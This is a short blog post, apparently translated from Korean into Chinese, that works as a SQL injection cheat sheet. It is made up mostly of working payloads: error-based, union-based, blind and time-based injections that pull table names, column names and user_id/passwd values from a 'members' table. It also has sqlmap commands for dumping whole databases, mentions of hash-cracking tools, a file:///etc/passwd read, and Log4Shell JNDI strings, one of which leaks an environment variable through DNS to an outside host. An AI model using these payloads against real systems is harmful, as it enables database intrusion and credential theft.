2021-06-03 · 4분
SQL Injection
SQL 注入概览:它是什么,以及主要攻击类型——逻辑错误(' or 1=1--)、基于 Union、盲注、基于时间、存储过程、基于错误——并附注入中常用字符的参考表。
2023-01-04 · 2분
这篇文章发布已超过两年,内容可能已过时。
' and db_name() > 1 -- -
' and db_name() > '1' -- -
' having 1=1 -- -
=> 表名:members
=> 第一个列名:num
' group by (num) -- -
=> 第二个列名:user_id
' group by num,user_id -- -
=> 第三个列名:passwd
' or 1 in (select user_id from members) -- -
' or 1 in (select user_id from members where user_id not in ('要排除的提取值')) --
' or 1 in (select 'a' + cast(count(*) as varchar(100)) from members) -- -
' UNION SELECT NULL,NULL,NULL -- -
SYSOBJECTS -> 表名:name
SYSCOLUMNS -> 列名:name
information_schema.tables -> 表名:table_name
information_schema.columns -> 表名:table_name,列名:column_name
' union select 1,2,3,4,table_name from information_schema.tables -- -
' union select 1,2,3,4,column_name from information_schema.columns where table_name='members' -- -
' union select 1,2,3,user_id,passwd from members -- -
TRUE : admin' and 1=1 -- -
FALSE : admin' and 1=2 -- -
select * from address where addr='昌宁邑' and 1=1 -- - 一定为真
substring(), ascii(), char()
substring('admin', 1,1) => 'a'
substring('admin'2,3) => 'dmi'
select * from address where addr='昌宁邑' and 'a'=substring('admin',1,1) -- - True
select * from address where addr='昌宁邑' and 'a'<substring((SELECT top 1 table_name from information_schema.tables),1,1) -- -
2 AND CHAR(119)=SUBSTRING(database(), 1, 1) -> 为真时返回值
'; if 1=1 wait
sqlmap -u "URL" --data "post_id=1&up_type=like" -p post_id --level =3 --dbs : 查看 Database 信息
sqlmap -u "URL" --data "post_id=1&up_type=like" -p post_id -D "database_name" --tables : 泄露 database 的 table
sqlmap -u "URL" --data "post_id=1&up_type=like" -p post_id -D "database_name" -T "table_name" --columns : 查询 table 的 columns
sqlmap -u "URL" --data "post_id=1&up_type=like" -p post_id -D "database_name" -T "table_name" -C "colum_name, column_name" --dump : 查询 colum_name 里所写列的值。
hash-identifier : 用于确认是什么 hash 值的工具
hashcat : hash 破解工具
file:///etc/passwd
[url:file:///flag]
${jndi:dns://google.com/flag=${env:FLAG}}
${jndi:${env:FLAG}}
原文(韩语): tistory — 发布于 2023-01-04,已迁移至本博客。本翻译由 AI 协助完成。
…